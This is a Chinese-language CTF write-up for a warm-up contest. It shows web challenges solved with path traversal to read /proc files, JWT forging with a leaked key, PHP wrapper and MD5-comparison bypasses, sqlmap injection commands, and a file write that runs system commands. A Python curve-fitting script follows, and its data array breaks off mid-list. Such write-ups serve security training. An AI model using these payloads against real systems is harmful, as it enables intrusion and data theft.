Spirit2023WarmUp-ALL

2023-10-17
作者 RikaCelery
~90.16K 字

1. Welcome
2. Web
3. AI Security
1. 3.1. curve from:(Astrageldon)
2. 3.2. poisonous from:(Astrageldon)
4. Misc
5. Crypto
6. Reverse
7. Osint
8. Pwn

Welcome

~~你有什么问题？~~

Web

点击后查看浏览器网络

base64解码即可

你喜欢鸣濑白羽吗

点下载，发现filename变量，尝试读取启动命令/download?filename=../../../../proc/self/cmdline

读取源文件得到源码，提取关键信息

SECRET_KEY = "I_LIKE_Aoyama_Nanami"
@app.route('/')
def index():
    token = request.cookies.get('auth')
    if not token:
        token = jwt.encode({
            'username': 'guest',
        }, SECRET_KEY, algorithm='HS256')

@app.route('/download', methods=['GET'])
    token = request.cookies.get('auth')
    data = jwt.decode(token, SECRET_KEY, algorithms=['HS256'])
    username = data['username']
     if username == 'admin' and filename == "yuanshen?qidong!":
        output = subprocess.check_output(['/readflag'])

所以Cookie拿到auth后，进jwt网站解密，然后修改username为admin，覆盖cookie，然后文件名yuanshen?qidong!得到flag`

baby_php

~~去你妈的php~~

<?php
error_reporting(0);
highlight_file(__FILE__);
if (!isset($_GET['a']) || !isset($_GET['b']))
    die('Never gonna give you up');
$a = $_GET['a'];
$b = $_GET['b'];
if ($a == $b || md5($a) != md5($b)) {  //1
    die('Never gonna let you down');
}
if (!isset($_GET['c'])) { //2
    die('Never gonna run around and desert you');
}
if (file_get_contents($_GET['c']) !== 'Never gonna make you cry') { //3
    die('Never gonna say goodbye');
}
if (!isset($_GET['d'])) { //4
    $_GET['d'] = 'flag.php';
    echo 'Never gonna tell a lie and hurt you';
}
include $_GET['d']; //5

1

使用网上的md5相同但不同的字符串或者数组均可绕过

2, 3

file_get_contents()

使用伪协议data://text/plain,Never gonna make you cry

4,5

使用伪协议php://filter/read=convert.base64-encode/resource=flag.php得到源码

1
2
3

<?php
$flag = $_ENV['FLAG'] ?? 'Spirit{fake-flag-qwq}';
file_put_contents('spiritflagqwq', $flag);

源码里面是把flag写到spiritflagqwq

置空，让他包含一次(执行php代码)

使用伪协议php://filter/read=convert.base64-encode/resource=spiritflagqwq得到flag

Spirit{3c01843e-7758-42ad-b614-c4d86aae570d}

ez_web

访问url，告诉我们403

访问/index.html

得到你的网速好快!闪了一下，猜测重定向

1	curl -G 'http://202.198.27.90:40029/index.html'

得到源码

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>测测你的网速</title>
    <script>
        window.location.href = 'test.php'
        //fffff_test.php
    </script>
</head>
<body>

</body>
</html>

继续访问//fffff_test.php

返回什么!?你连JQK都没有?给我一个JQK,我给你一个789。

考虑到web中给东西其实就是传参数，在curl给定JQK=789后返回good给我一个JQK,我给你一个789。

这里其实有个重定向（坑），但是curl默认不会跟随，使用-L或者浏览器得到源码

<?php 
    highlight_file(__file__);
    $filename = $_GET['file'];

    $content = file_get_contents($filename);
    if(preg_match('/flag/i',$content)){
        die();
    }
    echo $content;
?>

不太理解的过滤，大概可以用fiilter伪协议和base64绕过

添加参数file=/flag得到flag

Spirit{450d4a94-dfed-4590-ac4a-51b84eff66b4}

ez_sql

遇事不决，sqlmap跑一下

1	sqlmap -u '202.198.27.90:40048/index.php' -d 'username=1&password=123' --current-db -tamper 'space2comment.py'

拿到库名jluCTF

1	sqlmap -u '202.198.27.90:40048/index.php' -d 'username=1&password=123' -D jluCTF -tables -tamper 'space2comment.py'

拿到表flag

1	sqlmap -u '202.198.27.90:40048/index.php' -d 'username=1&password=123' -D jluCTF -T flag --columns -tamper 'space2comment.py'

找到列flag

1	sqlmap -u '202.198.27.90:40048/index.php' -d 'username=1&password=123' -D jluCTF -T flag -C flag --dump -tamper 'space2comment.py'

Spirit{xxxxxxxxxx}

打开url会自动跳转到http://202.198.27.90:40142/?location=index.html

考虑通过location获取源码

from flask import Flask, request, redirect
import os
import urllib

app = Flask(__name__)
app.secret_key = os.getenv('FLAG')


@app.route('/')
def handle():
    location = request.args.get('location')

    if location == None:
        return redirect('/?location=index.html')

    return open('./' + location).read()


app.run(host='0.0.0.0', port=1234, debug=True)

flag为app.secret_key = os.getenv('FLAG')

1是想办法生成pin码（不会）

2是想办法获得环境变量

../../../etc/passwd 不断添加 ../ 找到根目录

然后找文件 /proc/self/environ 获得flag

ez_web2

直接访问返回系统维护中，暂未开放

hint告诉我们robots

访问robots.txt

Disallow: login.php

访问得到登录界面

既然是系统维护中，暂未开放，使用弱口令测试

admin：123456

得到源码

<?php
error_reporting(0);
session_start();

highlight_file(__FILE__);

if(!$_SESSION['login']){
    echo '请先登录';
    die();
}

$data = $_POST['data'];
$filename = $_POST['filename'];
str_replace('php','',$data);
file_put_contents($filename,$data);
?>

没有过滤

data=data://text/plain,<?php system("ls /");?>

filename=data://text/plain,flag.php

同时不断刷新 /flag.php

发现根目录下flag文件

data=data://text/plain,<?php system("cat /flag");?>

获取flag

Spirit{xxxxxxxxxxxxx}（qwq）

AI Security

curve from:(Astrageldon)

折叠框的标题

"""

Draw a plot and you'll find that there're many many copies of something like cubic curves (yeah they really look like cubic curves).
And you'll find out that as the index of x goes up, the index of branch oscillates from 0 to 10, then 10 to 0 and so on.

"""



import numpy as np

def poly(x,y):
    s=0
    for i,j in enumerate(x):
        s+=y**(3-i)*j
    return str(s)

def main():
    real = []
    fn = []
    for i in range(11):
        r = []
        fn2=[]
        for j in range(0,800,20):
            k = j + i
            m = k//20*20+k%20
            n = k//20*20+(20-k%20)
            if m < 800:
                r.append('(%s,%s)'%(x_previous[m],y_prev[m]))
                fn2.append(m)
            if n < 800:
                r.append('(%s,%s)'%(x_previous[n],y_prev[n]))
                fn2.append(n)
        real.append(r)
        fn.append(fn2)
    a=[(lambda k:np.polyfit([x_previous[i] for i in fn[k]],[y_prev[i] for i in fn[k]],3))(j) for j in range(11)]
    y_predict=[poly(a[(lambda i: [k for k,j in enumerate(fn) if i in j][0])(i)],x_predict[i]) for i in range(100)]
    print("|".join(y_predict))



x_previous=[-3.0, -2.99, -2.98, -2.97, -2.96, -2.95, -2.94, -2.93, -2.92, -2.91, -2.9, -2.89, -2.88, -2.87, -2.86, -2.85, -2.84, -2.83, -2.82, -2.81, -2.8, -2.79, -2.78, -2.77, -2.76, -2.75, -2.74, -2.73, -2.7199999999999998, -2.71, -2.7, -2.69, -2.68, -2.67, -2.66, -2.65, -2.64, -2.63, -2.62, -2.61, -2.6, -2.59, -2.58, -2.57, -2.56, -2.55, -2.54, -2.53, -2.52, -2.51, -2.5, -2.49, -2.48, -2.4699999999999998, -2.46, -2.45, -2.44, -2.4299999999999997, -2.42, -2.41, -2.4, -2.39, -2.38, -2.37, -2.36, -2.35, -2.34, -2.33, -2.32, -2.31, -2.3, -2.29, -2.2800000000000002, -2.27, -2.26, -2.25, -2.24, -2.23, -2.2199999999999998, -2.21, -2.2, -2.19, -2.1799999999999997, -2.17, -2.16, -2.15, -2.14, -2.13, -2.12, -2.11, -2.1, -2.09, -2.08, -2.07, -2.06, -2.05, -2.04, -2.0300000000000002, -2.02, -2.01, -2.0, -1.99, -1.98, -1.97, -1.96, -1.95, -1.94, -1.93, -1.92, -1.91, -1.9, -1.89, -1.88, -1.8699999999999999, -1.8599999999999999, -1.8499999999999999, -1.84, -1.83, -1.82, -1.81, -1.8, -1.79, -1.78, -1.77, -1.76, -1.75, -1.74, -1.73, -1.72, -1.71, -1.7, -1.69, -1.68, -1.67, -1.66, -1.65, -1.64, -1.63, -1.6199999999999999, -1.6099999999999999, -1.5999999999999999, -1.59, -1.58, -1.57, -1.56, -1.55, -1.54, -1.53, -1.52, -1.51, -1.5, -1.49, -1.48, -1.47, -1.46, -1.45, -1.44, -1.43, -1.42, -1.41, -1.4, -1.39, -1.38, -1.3699999999999999, -1.3599999999999999, -1.3499999999999999, -1.3399999999999999, -1.33, -1.32, -1.31, -1.3, -1.29, -1.28, -1.27, -1.26, -1.25, -1.24, -1.23, -1.22, -1.21, -1.2, -1.19, -1.18, -1.17, -1.16, -1.15, -1.14, -1.13, -1.1199999999999999, -1.1099999999999999, -1.0999999999999999, -1.0899999999999999, -1.08, -1.07, -1.06, -1.05, -1.04, -1.03, -1.02, -1.01, -1.0, -0.9899999999999998, -0.98, -0.9699999999999998, -0.96, -0.9500000000000002, -0.94, -0.9300000000000002, -0.9199999999999999, -0.9100000000000001, -0.8999999999999999, -0.8900000000000001, -0.8799999999999999, -0.8700000000000001, -0.8599999999999999, -0.8500000000000001, -0.8399999999999999, -0.8300000000000001, -0.8199999999999998, -0.81, -0.7999999999999998, -0.79, -0.7799999999999998, -0.77, -0.7599999999999998, -0.75, -0.7399999999999998, -0.73, -0.7199999999999998, -0.71, -0.6999999999999997, -0.69, -0.6800000000000002, -0.6699999999999999, -0.6600000000000001, -0.6499999999999999, -0.6400000000000001, -0.6299999999999999, -0.6200000000000001, -0.6099999999999999, -0.6000000000000001, -0.5899999999999999, -0.5800000000000001, -0.5699999999999998, -0.56, -0.5499999999999998, -0.54, -0.5299999999999998, -0.52, -0.5099999999999998, -0.5, -0.48999999999999977, -0.48, -0.46999999999999975, -0.45999999999999996, -0.44999999999999973, -0.43999999999999995, -0.43000000000000016, -0.41999999999999993, -0.41000000000000014, -0.3999999999999999, -0.3900000000000001, -0.3799999999999999, -0.3700000000000001, -0.3599999999999999, -0.3500000000000001, -0.33999999999999986, -0.33000000000000007, -0.31999999999999984, -0.31000000000000005, -0.2999999999999998, -0.29000000000000004, -0.2799999999999998, -0.27, -0.2599999999999998, -0.25, -0.23999999999999977, -0.22999999999999998, -0.21999999999999975, -0.20999999999999996, -0.19999999999999973, -0.18999999999999995, -0.18000000000000016, -0.16999999999999993, -0.16000000000000014, -0.1499999999999999, -0.14000000000000012, -0.1299999999999999, -0.1200000000000001, -0.10999999999999988, -0.10000000000000009, -0.08999999999999986, -0.08000000000000007, -0.06999999999999984, -0.06000000000000005, -0.04999999999999982, -0.040000000000000036, -0.029999999999999805, -0.020000000000000018, -0.009999999999999787, 0.0, 0.010000000000000231, 0.020000000000000018, 0.03000000000000025, 0.040000000000000036, 0.050000000000000266, 0.06000000000000005, 0.07000000000000028, 0.08000000000000007, 0.08999999999999986, 0.10000000000000009, 0.10999999999999988, 0.1200000000000001, 0.1299999999999999, 0.14000000000000012, 0.1499999999999999, 0.16000000000000014, 0.16999999999999993, 0.18000000000000016, 0.18999999999999995, 0.20000000000000018, 0.20999999999999996, 0.2200000000000002, 0.22999999999999998, 0.2400000000000002, 0.25, 0.26000000000000023, 0.27, 0.28000000000000025, 0.29000000000000004, 0.30000000000000027, 0.31000000000000005, 0.3200000000000003, 0.33000000000000007, 0.33999999999999986, 0.3500000000000001, 0.3599999999999999, 0.3700000000000001, 0.3799999999999999, 0.3900000000000001, 0.3999999999999999, 0.41000000000000014, 0.41999999999999993, 0.43000000000000016, 0.43999999999999995, 0.4500000000000002, 0.45999999999999996, 0.4700000000000002, 0.48, 0.4900000000000002, 0.5, 0.5100000000000002, 0.52, 0.5300000000000002, 0.54, 0.5500000000000003, 0.56, 0.5700000000000003, 0.5800000000000001, 0.5899999999999999, 0.6000000000000001, 0.6099999999999999, 0.6200000000000001, 0.6299999999999999, 0.6400000000000001, 0.6499999999999999, 0.6600000000000001, 0.6699999999999999, 0.6800000000000002, 0.69, 0.7000000000000002, 0.71, 0.7200000000000002, 0.73, 0.7400000000000002, 0.75, 0.7600000000000002, 0.77, 0.7800000000000002, 0.79, 0.8000000000000003, 0.81, 0.8200000000000003, 0.8300000000000001, 0.8399999999999999, 0.8500000000000001, 0.8599999999999999, 0.8700000000000001, 0.8799999999999999, 0.8900000000000001, 0.8999999999999999, 0.9100000000000001, 0.9199999999999999, 0.9300000000000002, 0.94, 0.9500000000000002, 0.96, 0.9700000000000002, 0.98, 0.9900000000000002, 1.0, 1.0099999999999998, 1.0200000000000005, 1.0300000000000002, 1.04, 1.0499999999999998, 1.0600000000000005, 1.0700000000000003, 1.08, 1.0899999999999999, 1.0999999999999996, 1.1100000000000003, 1.12, 1.13, 1.1399999999999997, 1.1500000000000004, 1.1600000000000001, 1.17, 1.1799999999999997, 1.1900000000000004, 1.2000000000000002, 1.21, 1.2199999999999998, 1.2300000000000004, 1.2400000000000002, 1.25, 1.2599999999999998, 1.2700000000000005, 1.2800000000000002, 1.29, 1.2999999999999998, 1.3100000000000005, 1.3200000000000003, 1.33, 1.3399999999999999, 1.3500000000000005, 1.3600000000000003, 1.37, 1.38, 1.3899999999999997, 1.4000000000000004, 1.4100000000000001, 1.42, 1.4299999999999997, 1.4400000000000004, 1.4500000000000002, 1.46, 1.4699999999999998, 1.4800000000000004, 1.4900000000000002, 1.5, 1.5099999999999998, 1.5200000000000005, 1.5300000000000002, 1.54, 1.5499999999999998, 1.5600000000000005, 1.5700000000000003, 1.58, 1.5899999999999999, 1.6000000000000005, 1.6100000000000003, 1.62, 1.63, 1.6399999999999997, 1.6500000000000004, 1.6600000000000001, 1.67, 1.6799999999999997, 1.6900000000000004, 1.7000000000000002, 1.71, 1.7199999999999998, 1.7300000000000004, 1.7400000000000002, 1.75, 1.7599999999999998, 1.7700000000000005, 1.7800000000000002, 1.79, 1.7999999999999998, 1.8100000000000005, 1.8200000000000003, 1.83, 1.8399999999999999, 1.8500000000000005, 1.8600000000000003, 1.87, 1.88, 1.8899999999999997, 1.9000000000000004, 1.9100000000000001, 1.92, 1.9299999999999997, 1.9400000000000004, 1.9500000000000002, 1.96, 1.9699999999999998, 1.9800000000000004, 1.9900000000000002, 2.0, 2.01, 2.0200000000000005, 2.0300000000000002, 2.04, 2.05, 2.0600000000000005, 2.0700000000000003, 2.08, 2.09, 2.1000000000000005, 2.1100000000000003, 2.12, 2.13, 2.1399999999999997, 2.1500000000000004, 2.16, 2.17, 2.1799999999999997, 2.1900000000000004, 2.2, 2.21, 2.2199999999999998, 2.2300000000000004, 2.24, 2.25, 2.26, 2.2700000000000005, 2.2800000000000002, 2.29, 2.3, 2.3100000000000005, 2.3200000000000003, 2.33, 2.34, 2.3500000000000005, 2.3600000000000003, 2.37, 2.38, 2.3899999999999997, 2.4000000000000004, 2.41, 2.42, 2.4299999999999997, 2.4400000000000004, 2.45, 2.46, 2.4699999999999998, 2.4800000000000004, 2.49, 2.5, 2.51, 2.5200000000000005, 2.5300000000000002, 2.54, 2.55, 2.5600000000000005, 2.5700000000000003, 2.58, 2.59, 2.6000000000000005, 2.6100000000000003, 2.62, 2.63, 2.6399999999999997, 2.6500000000000004, 2.66, 2.67, 2.6799999999999997, 2.6900000000000004, 2.7, 2.71, 2.7199999999999998, 2.7300000000000004, 2.74, 2.75, 2.76, 2.7700000000000005, 2.7800000000000002, 2.79, 2.8, 2.8100000000000005, 2.8200000000000003, 2.83, 2.84, 2.8500000000000005, 2.8600000000000003, 2.87, 2.88, 2.8899999999999997, 2.9000000000000004, 2.91, 2.92, 2.9299999999999997, 2.9400000000000004, 2.95, 2.96, 2.9699999999999998, 2.9800000000000004, 2.99, 3.0, 3.01, 3.0200000000000005, 3.0300000000000002, 3.04, 3.05, 3.0600000000000005, 3.0700000000000003, 3.08, 3.09, 3.1000000000000005, 3.1100000000000003, 3.12, 3.13, 3.1400000000000006, 3.1500000000000004, 3.16, 3.17, 3.1799999999999997, 3.1900000000000004, 3.2, 3.21, 3.2199999999999998, 3.2300000000000004, 3.24, 3.25, 3.26, 3.2700000000000005, 3.2800000000000002, 3.29, 3.3, 3.3100000000000005, 3.3200000000000003, 3.33, 3.34, 3.3500000000000005, 3.3600000000000003, 3.37, 3.38, 3.3900000000000006, 3.4000000000000004, 3.41, 3.42, 3.4299999999999997, 3.4400000000000004, 3.45, 3.46, 3.4699999999999998, 3.4800000000000004, 3.49, 3.5, 3.51, 3.5200000000000005, 3.5300000000000002, 3.54, 3.55, 3.5600000000000005, 3.5700000000000003, 3.58, 3.59, 3.6000000000000005, 3.6100000000000003, 3.62, 3.63, 3.6400000000000006, 3.6500000000000004, 3.66, 3.67, 3.6799999999999997, 3.6900000000000004, 3.7, 3.71, 3.7199999999999998, 3.7300000000000004, 3.74, 3.75, 3.76, 3.7700000000000005, 3.7800000000000002, 3.79, 3.8, 3.8100000000000005, 3.8200000000000003, 3.83, 3.84, 3.8500000000000005, 3.8600000000000003, 3.87, 3.88, 3.8900000000000006, 3.9000000000000004, 3.91, 3.92, 3.9299999999999997, 3.9400000000000004, 3.95, 3.96, 3.9699999999999998, 3.9800000000000004, 3.99, 4.0, 4.01, 4.0200000000000005, 4.03, 4.04, 4.05, 4.0600000000000005, 4.07, 4.08, 4.09, 4.1000000000000005, 4.11, 4.12, 4.13, 4.140000000000001, 4.15, 4.16, 4.17, 4.18, 4.19, 4.2, 4.21, 4.22, 4.23, 4.24, 4.25, 4.26, 4.2700000000000005, 4.28, 4.29, 4.3, 4.3100000000000005, 4.32, 4.33, 4.34, 4.3500000000000005, 4.36, 4.37, 4.38, 4.390000000000001, 4.4, 4.41, 4.42, 4.43, 4.44, 4.45, 4.46, 4.47, 4.48, 4.49, 4.5, 4.51, 4.5200000000000005, 4.53, 4.54, 4.55, 4.5600000000000005, 4.57, 4.58, 4.59, 4.6000000000000005, 4.61, 4.62, 4.63, 4.640000000000001, 4.65, 4.66, 4.67, 4.68, 4.69, 4.7, 4.71, 4.72, 4.73, 4.74, 4.75, 4.76, 4.7700000000000005, 4.78, 4.79, 4.8, 4.8100000000000005, 4.82, 4.83, 4.84, 4.8500000000000005, 4.86, 4.87, 4.88, 4.890000000000001, 4.9, 4.91, 4.92, 4.930000000000001, 4.94, 4.95, 4.96, 4.97, 4.98, 4.99]
y_prev=[-66.85, -66.53936243704847, -67.16453085625052, -68.5864526770753, -70.58855645625054, -72.89794999999992, -75.21213154374955, -77.2285993229247, -78.67446114374954, -79.33314556295153, -79.0656, -77.82390076295152, -75.65594274374945, -72.70074972292468, -69.17486434374939, -65.35115000000006, -61.53207965625042, -58.02012627707529, -55.08815325625045, -52.95270323704847, -51.75279999999999, -51.536338437048485, -52.25539485625056, -53.77091667707533, -55.86633245625062, -58.26874999999999, -60.67566754374948, -62.784583322924746, -64.32260514374956, -65.07316156295155, -64.8972, -63.746796762951504, -61.6698467437495, -58.805373722924635, -55.3699203437495, -51.63634999999998, -47.9071356562505, -44.48475027707522, -41.64205725625048, -39.59559923704843, -38.4844, -38.356354437048495, -39.163538856250526, -40.766900677075256, -42.94986845625056, -45.43955000000004, -47.93344354374954, -50.129047322924784, -51.75346914374945, -52.59013756295156, -52.5, -51.43513276295154, -49.44343074374946, -46.66391772292467, -43.313136343749406, -39.663950000000064, -36.01883165625043, -32.680254277075164, -29.92108125625053, -27.957855237048474, -26.929599999999994, -26.884210437048488, -27.773762856250563, -29.459204677075224, -31.723964456250613, -34.295149999999985, -36.87025954374959, -39.14679132292474, -40.85185314374948, -41.768873562951555, -41.758799999999994, -40.773708762951514, -38.86149474374951, -36.16118172292475, -32.88931234374933, -29.31874999999999, -25.751967656250507, -22.491438277075233, -19.81002525625048, -17.92427123704844, -16.973200000000013, -17.004706437048462, -17.970866856250595, -19.73262867707527, -22.073420456250556, -24.72035000000004, -27.37091554374941, -29.722615322924796, -31.502557143749446, -32.49416956295156, -32.5584, -31.647324762951524, -29.808838743749465, -27.181965722924687, -23.983248343749416, -20.485549999999918, -16.99134365625057, -13.8031022770753, -11.193689256250535, -9.37964723704843, -8.5, -8.602642437048477, -9.63965085625056, -11.471972677075271, -13.88303645625055, -16.599950000000042, -19.32021154374953, -21.74131932292479, -23.590381143749486, -24.650825562951546, -24.783599999999996, -23.940780762951505, -22.17026274374946, -19.611069722924693, -16.479744343749417, -13.049149999999917, -9.621759656250505, -6.500046277075298, -3.956873256250537, -2.208783237048463, -1.3948000000000036, -1.5628184370484774, -2.664914856250517, -4.562036677075275, -7.037612456250547, -9.81875000000004, -12.602947543749528, -15.087703322924732, -17.000125143749486, -18.123641562951544, -18.3192, -17.53887676295154, -15.830566743749458, -13.333293722924696, -10.263600343749419, -6.894349999999926, -3.5280156562505036, -0.4670702770752344, 2.0156227437495087, 3.703520762951559, 4.457600000000003, 4.229965562951547, 3.068541143749483, 1.1123793229247294, -1.421948456250544, -4.261550000000038, -7.103923543749458, -9.646567322924735, -11.616589143749485, -12.797417562951548, -13.05, -12.326412762951534, -10.674550743749464, -8.233437722924702, -5.21961634374942, -1.905949999999999, 1.405088343749493, 4.411025722924762, 6.838998743749505, 8.472464762951558, 9.172400000000003, 8.890909562951528, 7.675917143749446, 5.666475322924677, 3.0791555437493936, 0.18684999999996899, -2.7079395437495224, -5.302711322924731, -7.324573143749484, -8.556953562951547, -8.860800000000001, -8.188188762951539, -6.587014743749467, -4.196301722924705, -1.2325923437494941, 2.0312499999999973, 5.292752343749489, 8.249441722924757, 10.628454743749504, 12.213248762951533, 12.8648, 12.535213562951526, 11.272413143749445, 9.215451322924677, 6.580899543749462, 3.641649999999969, 0.7002044562504799, -1.9409353229247843, -4.0088771437495225, -5.287049562951545, -5.636399999999997, -5.0090047629515135, -3.4527587437494685, -1.1066857229247642, 1.8126716562505027, 5.032449999999994, 8.250176343749485, 11.163377722924755, 13.499190743749462, 15.041072762951535, 15.65, 15.278077562951507, 13.973229143749467, 11.874507322924652, 9.198483543749463, 6.21805000000004, 3.2357084562505154, 0.5539606770753016, -1.5543011437495, -2.872505562951523, -3.2615999999999996, -2.6736607629515508, -1.1565827437494454, 1.1506102770752618, 4.031375656250571, 7.212849999999992, 10.392560343749519, 13.268033722924724, 15.566406743749502, 17.071136762951532, 17.6432, 17.23470156295154, 15.893565143749427, 13.758843322924738, 11.0471075437494, 8.031249999999973, 5.01377245625045, 2.2971766770752486, 0.15435485625047995, -1.1981215629515436, -1.6211999999999982, -1.066956762951527, 0.4167132562505085, 2.69078627707529, 5.538719656250498, 8.687650000000026, 11.835104343749446, 14.678609722924753, 16.94530274374946, 18.418640762951554, 18.959600000000002, 18.520285562951518, 17.14862114374949, 14.983659322924682, 12.241971543749468, 9.19644999999994, 6.14959645625052, 3.403912677075221, 1.232290856250522, -0.14869756295155412, -0.5999999999999996, -0.07369276295151117, 1.3823292562505287, 3.6290422770753317, 6.449903656250548, 9.572050000000095, 12.693008343749495, 15.510305722924691, 17.75107874374949, 19.19878476295152, 19.714399999999998, 19.250029562951546, 17.85359714374945, 15.664155322924756, 12.898275543749438, 9.828850000000031, 6.758380456250472, 3.989368677075279, 1.7947068562504924, 0.3909664370484691, -0.08279999999999887, 0.42133123704845943, 1.8554652562505591, 4.080578277075271, 6.880127656250597, 9.981250000000003, 13.081472343749546, 15.87832172292474, 18.098934743749524, 19.52676876295154, 20.0228, 19.539133562951527, 18.123693143749506, 15.915531322924707, 13.131219543749513, 10.043649999999971, 6.955324456250558, 4.16874467707524, 1.9568028562505457, 0.5360704370484513, 0.04560000000000031, 0.5333152370484786, 1.9513212562505124, 4.160594277075308, 6.944591656250509, 10.030450000000057, 13.115696343749464, 15.897857722924781, 18.10407074374947, 19.517792762951558, 20.0, 19.502797562951514, 18.07410914374947, 15.852987322924669, 13.056003543749464, 9.956049999999916, 6.855628456250509, 4.057240677075196, 1.8337788562505128, 0.4018144370484773, -0.09960000000000058, 0.37745923704845197, 1.7850972562505447, 3.9842902770752398, 6.758495656250558, 9.834849999999971, 12.910880343749515, 15.684113722924707, 17.881686743749505, 19.28705676295153, 19.761200000000002, 19.256221562951538, 17.82004514374944, 15.591723322924741, 12.787827543749408, 9.681250000000004, 6.574492456250461, 3.7700566770752717, 1.540834856250484, 0.10339843704845997, -0.4032, 0.06896323704846807, 1.471993256250574, 3.66686627707528, 6.437039656250472, 9.509650000000033, 12.582224343749438, 15.352289722924755, 17.54698274374945, 18.949760762951545, 19.421599999999998, 18.91460556295152, 17.476701143749487, 15.246939322924693, 12.441891543749495, 9.334449999999952, 6.227116456250549, 3.422392677075229, 1.1931708562505285, -0.2439775629515566, -0.75, -0.27697276295151063, 1.1272092562505218, 3.3235222770753357, 6.09542365625052, 9.170050000000082, 12.244928343749468, 15.017585722924798, 17.21515874374949, 18.621104762951518, 19.0964, 18.593149562951552, 17.159277143749456, 14.933835322924752, 12.133395543749447, 9.030850000000026, 5.928700456250498, 3.12944867707529, 0.9059868562505091, -0.5251135629515282, -1.0248000000000008, -0.545148762951543, 0.8659452562505621, 3.069458277075248, 5.848847656250585, 8.931249999999974, 12.014192343749533, 14.795201722924737, 17.00141474374951, 18.416288762951538, 18.9008, 18.407053562951532, 16.98297314374942, 14.767611322924724, 11.977539543749518, 8.885649999999993, 5.79444445625057, 3.0064246770752625, 0.7944828562505535, -0.6248095629515493, -1.112400000000001, -0.6203647629515228, 0.8034012562504991, 3.019874277075302, 5.812511656250514, 8.908450000000041, 12.005216343749463, 14.800337722924766, 17.020950743749466, 18.450512762951547, 18.95, 18.471517562951554, 17.062989143749377, 14.863467322924699, 12.089523543749486, 9.014050000000065, 5.939548456250369, 3.168520677075178, 0.9738588562505317, -0.42786556295151534, -0.8976000000000006, -0.38742076295150163, 1.054777256250519, 3.2899702770752137, 6.10161565625041, 9.216850000000111, 12.333200343749528, 15.148193722924677, 17.3889667437494, 18.83897676295157, 19.3592, 18.901741562951536, 17.514525143749545, 15.336603322924644, 12.584547543749421, 9.531249999999998, 6.479212456250573, 3.7309366770751833, 1.5593148562504933, 0.18091843704846333, -0.2652000000000019, 0.2688832370485006, 1.735273256250558, 3.99494627707527, 6.831359656250474, 9.971650000000183, 13.113344343749526, 15.953969722924732, 18.220662743749443, 19.6968807629515, 20.2436, 19.812925562951534, 18.452781143749505, 16.302219322924813, 13.577811543749357, 10.55244999999993, 7.528636456250576, 4.808872677075353, 2.666050856250454, 1.3167424370484433, 0.8999999999999986, 1.4637472370484286, 2.960089256250601, 5.2500022770753265, 8.116943656250541, 11.28804999999989, 14.460848343749596, 17.33286572292479, 19.631238743749485, 21.13942476295152, 21.718400000000003, 21.320269562951516, 19.992957143749464, 17.87551532292476, 15.184515543749555, 12.192849999999934, 9.203020456250513, 6.517528677075298, 4.409266856250575, 3.0948064370484456, 2.7132000000000005, 3.312371237048451, 4.844425256250469, 7.170338277075385, 10.073567656250543, 13.28124999999996, 16.490912343749383, 19.40008172292485, 21.735894743749526, 23.281808762951524, 23.898799999999994, 23.5389735629515, 22.250253143749426, 20.171691322924705, 17.51985954374956, 14.56764999999987, 11.617564456250449, 8.972104677075244, 6.904162856250535, 5.6303104370485, 5.289600000000004, 5.929955237048478, 7.5034812562505095, 9.871154277075142, 12.81643165625061, 16.06645000000003, 19.31873634374945, 22.270817722924665, 24.64983074374953, 26.239232762951545, 26.9, 26.58423756295155, 25.339869143749393, 23.305947322924712, 20.699043543749433, 17.792050000000074, 14.88746845625046, 12.28780067707519, 10.26593885625054, 9.038454437048465, 8.74440000000001, 9.431699237048479, 11.052457256250552, 13.467650277075203, 16.46073565625046, 19.758850000000105, 23.059520343749448, 26.06027372292472, 28.488246743749393, 30.126896762951546, 30.837200000000003, 30.57126156295156, 29.377005143749503, 27.39348332292466, 24.837267543749505, 21.981250000000006, 19.12793245625065, 16.579816677075137, 14.609794856250504, 13.434438437048485, 13.192799999999995, 13.932803237048502, 15.606553256250596, 18.075026277075256, 21.121679656250393, 24.473650000000173, 27.82846434374952, 30.88364972292478, 33.36634274374943, 35.06000076295146, 35.82560000000001, 35.61524556295154, 34.47686114374947, 32.54949932292482, 30.049731543749438, 27.250449999999944, 24.454156456250583, 21.9633526770753, 20.05093085625047, 18.933462437048473, 18.75, 19.54846723704842, 21.280969256250646, 23.808482277075314, 26.914463656250465, 30.326049999999938, 33.740768343749586, 36.85614572292484, 39.399318743749475, 41.1537447629515, 41.98040000000002, 41.83138956295153, 40.754637143749505, 38.88919532292476, 36.45163554374963, 33.714849999999885, 30.981340456250532, 28.553608677075367, 26.704546856250566, 25.650726437048462, 25.5312, 26.39389123704845, 28.19090525625041, 30.783218277075385, 33.954287656250536, 37.43125000000002, 40.91163234374936, 44.09296172292479, 46.70237474374953, 48.52332876295152, 49.41679999999999, 49.33489356295152, 48.325533143749475, 46.52777132292472, 44.15817954374957, 41.48964999999981, 38.824684456250466, 36.46578467707531, 34.68584285625054, 33.7014304370485, 33.651600000000016, 34.58427523704847, 36.45156125625046, 39.114434277075176, 42.3563516562506, 45.90445000000009, 49.45625634374943, 52.70929772292458, 55.39071074374958, 57.28395276295154, 58.25, 58.24095756295155, 57.30474914374945, 55.58042732292468, 53.284563543749506, 50.690050000000156, 48.099388456250416, 45.815080677075265, 44.1100188562505, 43.20077443704847, 43.22640000000002, 44.234819237048505, 46.178137256250494, 48.91733027707526, 52.23585565625068, 55.860850000000035, 59.489840343749506, 62.82035372292465, 65.57952674374943, 67.5508167629516, 68.5952, 68.66478156295153, 67.80748514374955, 66.16236332292462, 63.94598754374943, 61.4312500000001, 58.92065245625057, 56.71669667707522, 55.09227485625046, 54.263958437048466, 54.37079999999999, 55.46072323704853, 57.48583325625057, 60.3071062770753, 63.70799965625042, 67.41565000000011, 71.12758434374959, 74.54132972292471, 77.38402274374948, 79.43912076295162, 80.56760000000001, 80.72156556295154, 79.9489411437495, 78.38877932292489, 76.25765154374939, 73.82845000000003, 71.40367645625052, 69.28583267707535, 67.74781085625055, 67.00618243704845, 67.19999999999999, 68.37718723704843, 70.48984925625061, 73.39896227707527, 76.88798365625053, 80.68404999999986, 84.48468834374965, 87.98742572292478, 90.91939874374944, 93.0640647629515, 94.28240000000004, 94.52650956295153, 93.84431714374949, 92.37487532292484, 90.33475554374935, 87.99684999999998, 85.66366045625047, 83.63768867707529, 82.1918268562506, 81.54264643704845, 81.8292, 83.09941123704846, 85.30538525625043, 88.30809827707533, 91.89100765625058, 